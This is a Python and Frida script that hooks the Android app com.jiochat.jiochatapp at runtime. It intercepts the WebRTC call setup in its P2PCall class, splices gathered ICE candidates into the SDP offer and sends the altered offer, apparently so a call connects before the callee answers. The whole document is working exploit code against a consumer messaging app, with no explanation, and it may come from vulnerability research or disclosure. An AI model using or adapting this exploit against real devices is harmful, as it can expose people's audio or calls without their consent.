import frida
import sys

package_name = "com.jiochat.jiochatapp"



def on_message(message, data):
    if message['type'] == 'send':
        print("[*] {0}".format(message['payload']))
    else:
        print(message)

jscode = """

Java.perform(function () {


    var cm = Java.use('com.jiochat.jiochatapp.av.P2PCall');
    var oldoffer = "";    
    
    var sic = cm.onLocalDescription;
    var times = 0;

	  sic.implementation = function (a) {
	  	   var sdp = a;
	  	   var s = sdp.description.value;
                   oldoffer = s;
	  	console.log("on local description");
	  	times++;
	  	if(times == 2){
	  		sic.call(this, a);
		}
	  	// skip calling to give time for candidates
	  }



    var t = Java.use("org.webrtc.SessionDescription$Type");
    var sdesc = Java.use("org.webrtc.SessionDescription");
    var offer = t.fromCanonicalForm("offer");
    
    var ocand = "";
    var num = 0;

    var ic = cm.onIceCandidate;

	  ic.implementation = function (a) {
	  
	  	console.log("on ice candidate", a);
	  	ocand = ocand + "a=" + a.toString().slice(4, a.toString().indexOf("generation") - 1) + "\\r\\n"
	  	num++;
	  	if( num == 10){
	  		console.log("offer", offer);
	  		    var sd = oldoffer;
    			    sd = sd.replace("a=ice-ufrag", ocand + "a=ice-ufrag");
	  		    sd = sd.replace("renomination", "");
	  		sd = sd.replace("renomination", "");
	  		
	  		
	  		sd = sd.replace("5000\\r\\nc=IN IP4 0.0.0.0\\r\\na=ice-ufrag", "5000\\r\\nc=IN IP4 0.0.0.0\\r\\n"+ ocand +"a=ice-ufrag");
	  		console.log(sd);
	  		
	  		var sdp = sdesc.$new(offer, sd);
	  		console.log("sending", sd);
	  		this.onLocalDescription.call(this, sdp);
	  	}
	  	return ic.call(this, a);
	  
	  }
	  
	  
	var broker = Java.use("com.allstar.cinclient.brokers.RtmBroker");  

	var pc = Java.use('org.webrtc.PeerConnection');

	var SRD = pc.nativeSetRemoteDescription;

	SRD.implementation = function (o, sdp) {
		console.log("Setting Remote Description");
		SRD.call(this, o, sdp);
	};
  
	var SLD = pc.nativeSetLocalDescription;
	
	SLD.implementation = function (o, sdp) {
		console.log("Setting local description");
    		SLD.call(this, o, sdp);

  };

});
"""





devices = frida.enumerate_devices()
device = 0

if len(sys.argv) < 2:
	for item in devices:
		print(item.name)
	exit()	

for item in devices:
	print(item.name)
	if sys.argv[1] == item.name:
		device = item

process = device.attach(package_name)
script = process.create_script(jscode)
script.on('message', on_message)
print('[*] Running CTF')
script.load()
sys.stdin.read()
